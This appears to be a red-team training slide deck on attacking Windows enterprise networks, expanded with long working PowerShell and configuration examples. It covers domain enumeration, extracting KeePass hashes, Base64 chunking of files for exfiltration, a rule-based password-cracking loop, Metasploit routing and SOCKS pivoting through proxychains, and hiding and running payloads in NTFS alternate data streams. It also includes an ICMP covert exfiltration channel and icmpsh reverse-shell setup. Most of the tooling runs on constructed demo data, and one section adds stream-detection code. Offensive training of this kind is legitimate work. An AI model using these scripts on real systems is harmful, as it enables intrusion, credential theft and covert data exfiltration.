  • 29. Information Gathering PowerView • Part of the PowerSploit package https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon OR, for the latest version 3 (development) version https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 • PowerShell script that provides numerous functions for situational awareness and domain enumeration • A great ‘cheatsheet’ on functions and usage by @harmj0y https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 • Functions include: Get-DomainUser, Get-DomainGroup, Get-DomainGroupMember Get-NetDomain, Get-DomainPolicy, Get-DomainTrust, Get-DomainComputer, Find-DomainShare + LOADS more © in.security Ltd 2019, all rights reserved
  • 30. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Enumeration]
  • 31. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 32. Password Managers - KeePass © in.security Ltd 2019, all rights reserved • Password managers/vaults are often used to store privileged credentials and information • KeePass uses .kdb files (v1) and .kdbx files (v2) to store the database • We can’t just give the file to a password cracker so we need to extract the hash • keepass2john can do this and it comes shipped with Kali • We could then either install KeePass and load the database, or access directly over the command line using a tool like kpcli
• 33. How Can We Exfil The DataZ?
Transferring files using PowerShell:
$FileName = "<target_file>"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName))
ReadAllBytes – opens a binary file, reads the contents into a byte array and closes the file*
Base64 grows the data by roughly a third, so a large database becomes a noticeably larger transfer.
* https://docs.microsoft.com/en-us/dotnet/api/system.io.file.readallbytes
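Taking the slide's two lines a step further, here is an added example (not the slides' code) that splits the Base64 into transportable lines, records a SHA-256 so the receiving side can prove the file arrived intact, and reverses the process. The temp file it exfiltrates is constructed by the script itself, and the chunk size and the transport (how the lines actually leave the host) are assumptions, not anything the slides specify.

```powershell
# Added example, not the slides' own code: round-trip the slide's Base64 technique with chunking
# and an integrity check. Works on a temp file it creates itself; chunk size and transport are
# assumptions for the demo.

function ConvertTo-ExfilChunks {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Base64 characters per line; 76 is the MIME default, smaller fits DNS labels or HTTP headers
        [int]$ChunkSize = 76
    )
    $bytes  = [IO.File]::ReadAllBytes($Path)                      # same call as the slide
    $b64    = [Convert]::ToBase64String($bytes)                   # ~4/3 size growth
    $sha256 = (Get-FileHash -Path $Path -Algorithm SHA256).Hash    # receiver verifies against this
    $chunks = for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
        $b64.Substring($i, [Math]::Min($ChunkSize, $b64.Length - $i))
    }
    [pscustomobject]@{
        Name   = [IO.Path]::GetFileName($Path)
        Sha256 = $sha256
        Count  = @($chunks).Count
        Chunks = @($chunks)
    }
}

function Restore-ExfilChunks {
    param(
        [Parameter(Mandatory)][string[]]$Chunks,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256
    )
    # FromBase64String throws on a truncated or corrupted stream, so a partial transfer fails loudly
    $bytes = [Convert]::FromBase64String(-join $Chunks)
    [IO.File]::WriteAllBytes($OutFile, $bytes)
    if ($ExpectedSha256) {
        $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
        if ($actual -ne $ExpectedSha256) {
            throw "Integrity check failed: got $actual, expected $ExpectedSha256"
        }
    }
    return $bytes.Length
}

# Demo with a constructed file standing in for a KeePass database
$src = Join-Path $env:TEMP 'demo.kdbx'
[IO.File]::WriteAllBytes($src, [byte[]](1..2000 | ForEach-Object { $_ % 256 }))
$pkg = ConvertTo-ExfilChunks -Path $src -ChunkSize 64
"$($pkg.Name): $($pkg.Count) chunks, sha256 $($pkg.Sha256)"
# ... move $pkg.Chunks off the host by whatever channel the engagement allows ...
$dst = Join-Path $env:TEMP 'demo.restored.kdbx'
Restore-ExfilChunks -Chunks $pkg.Chunks -OutFile $dst -ExpectedSha256 $pkg.Sha256   # returns 2000
```

Carrying the hash out of band (or as the first chunk) is what turns "I think it copied" into "it copied": a KeePass database that lost a few bytes in transit will not open, and you want to know that before the shell is gone.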
• 34. Our 45min Pwnage Plan… DEMO… [Exfiltration]
• 36. Offline Password Cracking
Success depends on a number of factors:
• Algorithm complexity
• Password length / complexity
• Hardware (GPU/FPGA/ASIC)
Password cracking process:
• Hash the clear text candidate
• Compare to stolen hash
• No match? Start again
• Match = Win!
• 37. Brute Force Attack
• Try every possible combination of every character
• Not used 99% of the time…
Pros
• 100% GUARANTEED to crack (provided the character set and length you search actually cover the password)
Cons
• You likely won't be around to see it happen!
• 38. Brute Force Attack
• Key space = char set ^ length
• 8x NVIDIA GTX 1080 Ti GPUs, NTLM (Windows) hashes @ 513 GH/s* (full 95 char printable set)
• Time to exhaust the key space (worst case; on average a password falls about halfway through):
• 8 char NTLM = 3.5 hours
• 9 char NTLM = 14 days
• 10 char NTLM = 3.7 years
• 11 char NTLM = 351 years
• 12 char NTLM = 33,401 years
• 13 char NTLM = 3.2 million years
* https://gist.github.com/epixoip/ace60d09981be09544fdd35005051505
• 39. Dictionary Attack
Wordlist       Rules (applied to "insecurity")
insecurity     Insecurity
Password       1nsecurity
monkey         ins3curity!
1234567        Ins3cur1ty
Qwerty         in53cur!ty
letmein
• Wordlist contains password candidates
• Most commonly used
• Can be mangled with rules
Pros
• Wordlists contain common passwords
• Mangling addresses the human element
Cons
• Only as good as your dictionary/rules
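To make the slide 36 loop and the slide 39 rules concrete, here is an added example (not the slides' code and not a real cracker) that hashes each mangled candidate and compares it against a set of "stolen" hashes. SHA-256 stands in for the hash algorithm because .NET has no built-in MD4 (NTLM is MD4 over the UTF-16LE password); the stolen hashes are constructed in the demo from plaintexts we choose, so the whole block runs offline. The rule syntax is the hashcat one, but only the subset listed in the comments is implemented.

```powershell
# Added example, not the slides' own code: the slide-36 loop (hash candidate, compare, repeat)
# driven by the slide-39 wordlist and a handful of hashcat-style mangling rules. SHA-256 replaces
# NTLM/MD4 here because .NET does not ship MD4; the "stolen" hashes are constructed for the demo.

function Apply-Rule {
    param([string]$Word, [string]$Rule)
    # Subset of the hashcat rule language: ':' nothing, 'l'/'u' lower/upper, 'c' capitalise,
    # 'r' reverse, 'd' duplicate, '$X' append X, '^X' prepend X, 'sXY' replace every X with Y.
    # Functions may be separated by spaces, as in hashcat rule files.
    $w = $Word
    $i = 0
    while ($i -lt $Rule.Length) {
        switch -CaseSensitive ($Rule[$i]) {
            ':' { }
            ' ' { }
            'l' { $w = $w.ToLower() }
            'u' { $w = $w.ToUpper() }
            'c' { if ($w.Length -gt 0) { $w = $w.Substring(0, 1).ToUpper() + $w.Substring(1).ToLower() } }
            'r' { $chars = $w.ToCharArray(); [array]::Reverse($chars); $w = -join $chars }
            'd' { $w = $w + $w }
            '$' { $i++; $w = $w + [string]$Rule[$i] }
            '^' { $i++; $w = [string]$Rule[$i] + $w }
            's' {
                if ($i + 2 -ge $Rule.Length) { throw "Rule '$Rule': 's' needs two characters" }
                $w = $w.Replace([string]$Rule[$i + 1], [string]$Rule[$i + 2])   # every occurrence, like hashcat
                $i += 2
            }
            default { throw "Rule '$Rule': unsupported function '$($Rule[$i])'" }
        }
        $i++
    }
    return $w
}

function Get-CandidateHash {
    param([string]$Candidate)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try   { $bytes = $sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Candidate)) }
    finally { $sha.Dispose() }
    return ([System.BitConverter]::ToString($bytes) -replace '-', '').ToLower()
}

function Invoke-DictionaryAttack {
    param([string[]]$TargetHashes, [string[]]$Wordlist, [string[]]$Rules)
    $remaining = [System.Collections.Generic.HashSet[string]]::new()
    foreach ($h in $TargetHashes) { [void]$remaining.Add($h.ToLower()) }
    $cracked = @{}
    $tested  = 0
    foreach ($word in $Wordlist) {
        foreach ($rule in $Rules) {
            $candidate = Apply-Rule -Word $word -Rule $rule
            $tested++
            $h = Get-CandidateHash $candidate                 # hash the clear text candidate
            if ($remaining.Contains($h)) {                    # compare to the stolen hash(es)
                $cracked[$h] = $candidate                     # match = win
                [void]$remaining.Remove($h)
            }                                                 # no match? next candidate
        }
    }
    [pscustomobject]@{ Cracked = $cracked; Tested = $tested; Uncracked = @($remaining) }
}

# Slide 39's wordlist column plus rules that reproduce its "Rules" column
$wordlist = 'insecurity', 'Password', 'monkey', '1234567', 'Qwerty', 'letmein'
$rules    = ':', 'c', 'se3', 'c se3 $!', 'c se3 si1', 'ss5 se3 si!'
# Constructed "stolen" hashes: two we expect to fall, one that no rule above produces
$stolen = (Get-CandidateHash 'Ins3curity!'), (Get-CandidateHash 'monkey'), (Get-CandidateHash 'Tr0ub4dor&3')
$result = Invoke-DictionaryAttack -TargetHashes $stolen -Wordlist $wordlist -Rules $rules
$result.Cracked        # Ins3curity! (insecurity + 'c se3 $!') and monkey (+ ':')
$result.Uncracked      # the third hash: only as good as your dictionary/rules
```

The ordering matters for more than the demo: candidates are generated per word and per rule, so a rule file with 10,000 entries multiplies a 10-million-word list into 10^11 hash operations. Fast hashes like NTLM make that affordable; a slow, salted KDF does not, which is the "algorithm complexity" factor from slide 36.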
• 40. Our 45min Pwnage Plan… DEMO… [Cracking]
• 42. Routing in Metasploit
• Traffic to target networks can be routed over existing sessions…
• To add a route: route add <$network> <$mask> <$sessionID>
• Take the session ID from sessions -l, and check the result with route print; a route bound to a session that later dies silently stops working
• 43. SOCKS Proxies
• A server that establishes a connection to a destination on behalf of a client
• Metasploit SOCKS modules: auxiliary/server/socks4a, auxiliary/server/socks5 (newer Metasploit versions merge these into auxiliary/server/socks_proxy with a VERSION option)
"This module provides a socksx proxy server that uses the built-in Metasploit routing to relay connections" *
• This functionality allows programs external to Metasploit to utilise the routes configured within msf and gain access to the target system(s)/network(s) …with the help of proxychains
• 44. SOCKS Proxies & Proxychains
• Proxychains / http://proxychains.sourceforge.net
• Supports TCP only (no UDP, with the exception of DNS lookups, which it can tunnel via the proxy_dns option)
• Used to allow any dynamically linked program to run through a SOCKS proxy: it works by LD_PRELOAD-hooking the socket calls, so statically linked binaries and raw-socket tools (e.g. nmap SYN scans) bypass it
• Configuration file @ /etc/proxychains.conf (current Kali ships proxychains-ng, so the command is also available as proxychains4 with /etc/proxychains4.conf)
• Then run a program through the proxy!
proxychains smbclient -W insec-xxxx.local //10.133.50.xxx/<$fileshare> -U <$targetUser>%<$password>
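Putting slides 42 to 44 together, here is an added example (not from the slides) of the two files a pivot needs: an msfconsole resource script and the tail of the proxychains configuration. The session ID (1) and the 10.133.50.0/24 prefix are hypothetical values standing in for what `sessions -l` and the enumeration step would give you; the smbclient line is the slide's own, placeholders included.

```text
# pivot.rc - msfconsole resource script (added example, not from the slides).
# Session 1 and 10.133.50.0/24 are hypothetical; take them from `sessions -l` and from enumeration.
route add 10.133.50.0 255.255.255.0 1
route print                         # confirm the prefix is bound to the intended session
use auxiliary/server/socks4a        # newer Metasploit: use auxiliary/server/socks_proxy, set VERSION 4a
set SRVHOST 127.0.0.1               # loopback only: the default 0.0.0.0 offers your pivot to your whole LAN
set SRVPORT 1080
run -j

# /etc/proxychains.conf tail (or /etc/proxychains4.conf for proxychains-ng). Kali's default entry
# points at Tor on 9050; replace it, don't append to it, or the chain tries Tor first.
strict_chain                        # error out if the hop is down instead of silently going direct
proxy_dns                           # resolve names through the proxy so lookups don't leave your own interface
[ProxyList]
socks4 127.0.0.1 1080

# Usage, from the Kali host:
#   msfconsole -r pivot.rc
#   proxychains smbclient -W insec-xxxx.local //10.133.50.xxx/<$fileshare> -U <$targetUser>%<$password>
#   proxychains nmap -sT -Pn -n -p 445,3389 10.133.50.xxx    # connect scan only: -sS raw sockets bypass the hook
```

`strict_chain` is the setting worth checking before a sensitive engagement step: with `dynamic_chain` or a dead proxy, some tools fall back to connecting directly from your own address, which is exactly the traffic the route was supposed to hide.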
• 45. Our 45min Pwnage Plan… DEMO… [SOCKS & Shellz]
• 47. Hiding Data
• Alternate Data Streams (ADS) allow one file system entry to contain multiple data sets (NTFS only; the extra streams are lost when the file is copied to FAT/exFAT or sent over most transfer channels)
• The file's normal content is the unnamed 'main' ($DATA) stream; additional streams are appended to the filename, colon delimited:
File.txt
File.txt:secretdata.txt:$DATA
File.txt:shell.exe:$DATA
• Explorer and a plain dir show only the main stream's size; dir /R or Get-Item -Stream * reveal the rest
• One option to trigger: wmic process call create File.txt:shell.exe (wmic is deprecated in current Windows releases, so check it is present first)
• A nice article by Oddvar Moe on executing files from ADS: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
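The following added example (not the slides' code) writes data into an alternate data stream, shows what the main stream still reports, and then does what a defender would do: enumerates every non-main stream under a directory and removes the one we planted. It needs an NTFS volume (Windows); the directory, file and stream names are assumptions for the demo, and the "secret" is a constructed string, not a credential.

```powershell
# Added example, not the slides' own code: hide, find and remove data in NTFS alternate data streams.
# Windows/NTFS only; works on a temp directory it creates. Names below are demo assumptions.

function Hide-InAds {
    param([Parameter(Mandatory)][string]$Path,
          [Parameter(Mandatory)][string]$Stream,
          [Parameter(Mandatory)][string]$Content)
    # Same file system entry, second stream: the main stream and its reported size are untouched
    Set-Content -Path $Path -Stream $Stream -Value $Content -NoNewline
}

function Get-AdsInventory {
    param([Parameter(Mandatory)][string]$Directory)
    # Get-Item -Stream * lists every stream; the unnamed main one shows up as ':$DATA'.
    # Zone.Identifier is the benign Mark-of-the-Web stream browsers add to downloads, so it is
    # reported but not flagged; anything else deserves a look.
    Get-ChildItem -Path $Directory -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Select-Object FileName, Stream, Length,
            @{ Name = 'Suspicious'; Expression = { $_.Stream -ne 'Zone.Identifier' } }
}

function Remove-Ads {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Stream)
    Remove-Item -Path $Path -Stream $Stream        # deletes only that stream, the file itself stays
}

# Demo
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'File.txt'
Set-Content -Path $file -Value 'Nothing to see here.'
Hide-InAds -Path $file -Stream 'secretdata.txt' -Content 'constructed sample: not a real secret'

(Get-Item $file).Length                            # main stream only: the hidden bytes are not counted
Get-Content -Path $file -Stream 'secretdata.txt'   # reading the hidden stream back
Get-AdsInventory -Directory $dir | Format-Table -AutoSize   # what dir /R or this function shows a defender
Remove-Ads -Path $file -Stream 'secretdata.txt'
Get-AdsInventory -Directory $dir                   # nothing left to report
```

Run `Get-AdsInventory` against a user's profile or a web root before trusting the picture the normal directory listing gives you; the `Suspicious` column does the first triage, but a stream called `Zone.Identifier` that is kilobytes long rather than a few dozen bytes is also worth opening.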
• 48. Exfiltrating Data Over ICMP
• ICMP has no ports (only types/codes) and is often left enabled, forgotten and not monitored
• Overcomes network egress issues when the usual channels are blocked
• icmpsh is a reverse ICMP shell (https://github.com/inquisb/icmpsh)
• The master (attacker side) is available in C, Perl and Python
• The slave, which runs on the compromised host, is a Win32 binary and needs no admin rights
• We have to stop the attacking host's kernel from answering echo requests itself, so that the icmpsh master receives them instead, and then start the master:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
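To show what the slave side of such a channel actually puts on the wire, here is an added example (not icmpsh and not from the slides) that frames data into ICMP echo-request payloads using .NET's `System.Net.NetworkInformation.Ping`, which sends echo requests without raw sockets or admin rights. The 4-byte index/count header and the 32-byte payload size are assumptions for the demo; the receiving side is simulated in-process (a real master would sniff the requests after the `sysctl` above stops the kernel answering them), so the block runs offline and the only line that touches the network is commented out.

```powershell
# Added example, not icmpsh and not the slides' own code: carry data in ICMP echo-request payloads
# with System.Net.NetworkInformation.Ping (no raw sockets / admin needed on the Windows side).
# Framing (2-byte index, 2-byte count, data) and 32-byte payloads are demo assumptions.

function ConvertTo-IcmpFrames {
    param([Parameter(Mandatory)][byte[]]$Data, [int]$PayloadSize = 32)
    $dataPerFrame = $PayloadSize - 4
    [int]$total = [Math]::Ceiling($Data.Length / $dataPerFrame)
    for ($n = 0; $n -lt $total; $n++) {
        $end   = [Math]::Min(($n + 1) * $dataPerFrame, $Data.Length) - 1
        $slice = $Data[($n * $dataPerFrame)..$end]
        # Header: frame index and frame count as big-endian uint16, so the receiver can reorder and dedupe
        $hdr = [byte[]]@((($n -shr 8) -band 0xFF), ($n -band 0xFF), (($total -shr 8) -band 0xFF), ($total -band 0xFF))
        ,([byte[]]($hdr + $slice))          # unary comma keeps each frame a separate byte[]
    }
}

function Send-IcmpFrames {
    param([Parameter(Mandatory)][string]$Target, [Parameter(Mandatory)][object[]]$Frames, [int]$TimeoutMs = 1000)
    $ping = New-Object System.Net.NetworkInformation.Ping
    try {
        foreach ($f in $Frames) {
            # Ping.Send(host, timeout, buffer): the buffer becomes the echo payload. A reply is not needed
            # for one-way exfil; shells like icmpsh carry their commands back in the reply payload.
            $reply = $ping.Send($Target, $TimeoutMs, [byte[]]$f)
            "$($f.Length)-byte frame -> $($reply.Status)"
        }
    } finally { $ping.Dispose() }
}

function ConvertFrom-IcmpFrames {
    # Receiver side (simulated here): rebuild the data from captured payloads, in any order, with duplicates
    param([Parameter(Mandatory)][object[]]$Payloads)
    $byIndex = @{}
    $total   = $null
    foreach ($p in $Payloads) {
        $idx = ($p[0] -shl 8) -bor $p[1]
        $cnt = ($p[2] -shl 8) -bor $p[3]
        if ($null -eq $total) { $total = $cnt }
        $byIndex[$idx] = [byte[]]$p[4..($p.Length - 1)]     # a retransmitted frame simply overwrites
    }
    $missing = 0..($total - 1) | Where-Object { -not $byIndex.ContainsKey($_) }
    if ($missing) { throw "Missing frames: $($missing -join ',')" }
    return [byte[]](0..($total - 1) | ForEach-Object { $byIndex[$_] })
}

# Demo with constructed data
$secret = [Text.Encoding]::UTF8.GetBytes('constructed sample payload: svc account notes, 71 bytes of them')
$frames = @(ConvertTo-IcmpFrames -Data $secret -PayloadSize 32)
"$($frames.Count) echo requests needed"
# Simulate the network: frames arrive reversed and the first one twice; the receiver must cope
$received = @($frames[($frames.Count - 1)..0]) + ,$frames[0]
[Text.Encoding]::UTF8.GetString((ConvertFrom-IcmpFrames -Payloads $received))
# Send-IcmpFrames -Target '10.133.50.xxx' -Frames $frames   # LAB master (placeholder address); off by default
```

Two things to take from the framing: a payload of 28 data bytes per request means a 1 MB file is about 37,000 echo requests, which is what a defender's "ICMP volume per host" dashboard catches; and the default Windows ping payload is 32 bytes of a fixed pattern, so a payload that is the wrong size or not that pattern is the simplest detection rule for this channel.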
• 49. Our 45min-ish Pwnage Plan… DEMO… [ADS & OOB ICMP… if time permits!]
• 50–51. Our 45min Pwnage Plan… Phish, Kibana, Phish#2, Enumeration, Exfiltration, Password Cr@cK5, SOCKS Proxies, OOB Persistence: all done. </DEMO>
• 52. Much, Much More… June 6th/7th @44CON
https://44con.com/44con-training/hacking-enterprises-exploiting-insecurity/